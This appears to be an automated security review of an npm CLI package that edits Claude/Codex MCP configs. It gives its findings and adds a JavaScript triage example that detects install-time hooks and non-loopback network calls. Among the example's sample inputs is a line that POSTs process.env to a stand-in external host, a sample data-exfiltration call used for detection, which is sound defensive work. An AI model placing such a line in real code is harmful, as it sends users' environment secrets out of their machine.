AI Security Review
scanned 2h ago · by lpm-firewall-ai
No confirmed malicious attack surface was established. The package has explicit, user-invoked workflow and dashboard features that can start local processes and manage Claude/Codex MCP configuration, but no install-time mutation, exfiltration, or remote payload execution was found.
Decision evidence
public snapshot
- Dashboard MCP routes can modify ~/.codex/config.toml, ~/.claude.json, and project .mcp.json via API endpoints.
- Runtime commands use child_process for relaunch, dashboard start/stop, browser open, and optional dev startup.
- Package ships AI-agent extension directories (.claude/.codex/.agents/.agy) in package files.
- package.json has no preinstall/install/postinstall hook; only prepublishOnly build scripts.
- bin/maestro.js only self-relaunches node with WASM flags and then imports the CLI.
- Network calls in dist/src/commands/view.js and dist/src/commands/stop.js go to the localhost dashboard health/workspace/shutdown APIs.
- dashboard MCP config mutation is explicit runtime dashboard/API functionality, not install-time hijack.
- test_aco.py is plain Python test code for the bundled team-swarm scripts, not a binary or hidden payload.
- No credential harvesting or external exfiltration endpoint found in inspected hot files.
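The three questions the evidence above answers (does package.json carry an install-time hook, which files reach for child_process, and do the network targets stay on loopback) can be reduced to a small triage routine. The following is an added example, not the scanner's or the package's own code: the package.json objects, file paths, hosts and commands in it are constructed for illustration, and the regex-based detection is a deliberately crude heuristic, not the scanner's logic.

```javascript
// Added example (not lpm-firewall-ai's or the reviewed package's code).
// Inputs below are constructed; every path, host and command is hypothetical.

// npm lifecycle scripts that a consumer's `npm install` executes. `prepare`
// runs only for git dependencies and a local `npm install` of the package
// itself; `prepublishOnly` runs only on the author's `npm publish`, which is
// why a package whose only scripts are build + prepublishOnly has no
// install-time hook.
const INSTALL_TIME_SCRIPTS = ["preinstall", "install", "postinstall", "prepare"];

function installTimeHooks(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_TIME_SCRIPTS.filter((name) => name in scripts);
}

// Loopback hosts: requests to these are local IPC, not exfiltration.
const LOOPBACK = new Set(["localhost", "127.0.0.1", "[::1]"]);

// Pull every http(s) host out of a source string and bucket it as
// loopback or external. Bracketed IPv6 literals are matched as a unit.
function classifyNetworkTargets(source) {
  const re = /https?:\/\/(\[[^\]]+\]|[^/:"'\s`)]+)/g;
  const out = { localhost: [], external: [] };
  for (const m of source.matchAll(re)) {
    const host = m[1];
    (LOOPBACK.has(host) ? out.localhost : out.external).push(host);
  }
  return out;
}

// Does the file reach for process execution at all?
function usesChildProcess(source) {
  return /\bchild_process\b|\b(?:execSync|execFileSync|spawnSync|spawn|exec|execFile)\s*\(/.test(source);
}

function triage(pkg, sources) {
  const findings = [];
  for (const [path, src] of Object.entries(sources)) {
    const net = classifyNetworkTargets(src);
    const exec = usesChildProcess(src);
    if (exec && net.external.length > 0) {
      // Execution plus an outbound non-loopback request in one file is the
      // combination to read first.
      findings.push({ path, reason: "exec+external-network", hosts: net.external });
    } else if (exec) {
      // Execution whose only network contact is loopback: record the loopback
      // hosts so the reviewer can see that nothing leaves the machine.
      findings.push({ path, reason: "exec", hosts: net.localhost });
    } else if (net.external.length > 0) {
      findings.push({ path, reason: "external-network", hosts: net.external });
    }
  }
  const hooks = installTimeHooks(pkg);
  return {
    installTimeHooks: hooks,
    findings,
    // Runtime-only behaviour needs a user to invoke a command; an install-time
    // hook runs on every `npm install` and changes the verdict by itself.
    verdict: hooks.length > 0 ? "install-time-review" : "runtime-only",
  };
}

// Constructed inputs: a hypothetical CLI package with only build scripts.
const SAMPLE_PKG = {
  name: "example-cli",
  scripts: { build: "tsc -p .", prepublishOnly: "npm run build" },
  bin: { "example-cli": "bin/cli.js" },
};
const SAMPLE_SOURCES = {
  "dist/commands/view.js": [
    'const { execSync } = require("child_process");',
    'const health = await fetch("http://127.0.0.1:4000/api/health");',
    'execSync("npm install --no-save example-plugin", { stdio: "inherit" });',
  ].join("\n"),
  "dist/telemetry.js":
    'fetch("https://collector.example.invalid/ingest", { method: "POST", body: JSON.stringify(process.env) });',
};
// Constructed counter-example: a package with a real install-time hook.
const SAMPLE_PKG_HOOKED = {
  name: "example-hooked",
  scripts: { postinstall: "node scripts/setup.js" },
};

console.log(JSON.stringify(triage(SAMPLE_PKG, SAMPLE_SOURCES), null, 2));
console.log("hooked package:", installTimeHooks(SAMPLE_PKG_HOOKED));
```

For the constructed inputs, view.js is reported as `exec` with only 127.0.0.1 as a host, telemetry.js as `external-network`, and the overall verdict is `runtime-only`; the hooked package is reported with its `postinstall` script and gets `install-time-review`. Any real review still has to read the flagged files: a runtime `npm install` invocation or an MCP config write is benign only if it is reached solely through an explicit user command.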
Source & flagged code
11 flagged
- dist/src/migrations/_template.js (line 44): Package source references dynamic require/import behavior.
- dist/src/tools/core-memory.js (line 31): Package source references weak cryptographic algorithms.
- dist/src/commands/view.js (line 181): A single source file combines environment access, network access, and code or shell execution; review context before blocking.
- dist/src/commands/view.js (line 196): Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.
- dist/src/commands/view.js (line 116): Package source invokes a package manager install command at runtime.
- dashboard/dist-server/dashboard/src/server/routes/mcp.js (line 10): Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.
- dist/src/tools/impeccable/live/server.js (line 1): Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.
- .agents/skills/team-adversarial-swarm/scripts/test_aco.py: Package hides binary, compressed, or executable-looking payloads in test/fixture/hidden paths.
- .agents/skills/team-adversarial-swarm/scripts/test_aco.py: Package ships non-JavaScript build or shell helper files.